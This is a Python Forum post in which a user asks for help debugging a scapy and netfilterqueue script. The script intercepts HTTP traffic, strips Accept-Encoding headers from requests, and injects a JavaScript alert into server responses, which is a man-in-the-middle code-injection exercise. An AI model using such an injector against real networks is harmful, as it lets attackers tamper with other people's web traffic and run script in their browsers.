+- Python Forum (https://python-forum.io)
+-- Forum: Python Coding (https://python-forum.io/forum-7.html)
+--- Forum: Web Scraping & Web Development (https://python-forum.io/forum-13.html)
+--- Thread: code injector (scapy), replace does not work (/thread-27928.html)
code injector (scapy), replace does not work - iago - Jun-27-2020
Hello, I try to inject JS-Code into a (server) response package.
I can show the response packages with:
print(scapy_packet.show())However, the line
modified_load = scapy_packet[scapy.Raw].load.replace("</body>", "<script>alert('test');</script></body>")does not seem to work at all.No replacement, no JS-alert, no error message, nothing.
I would be grateful for a helping hand. Thanks
#!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
print("[+] Request")
modified_load = re.sub("Accept-Encoding:.*?\\r\\n", "", scapy_packet[scapy.Raw].load)
new_packet = set_load(scapy_packet, modified_load)
packet.set_payload(str(new_packet))
elif scapy_packet[scapy.TCP].sport == 80:
print("[+] Response")
modified_load = scapy_packet[scapy.Raw].load.replace("/n</body>", "<script>alert('test');</script></body>")
print(scapy_packet.show())
new_packet = set_load(scapy_packet, modified_load)
packet.set_payload(str(new_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()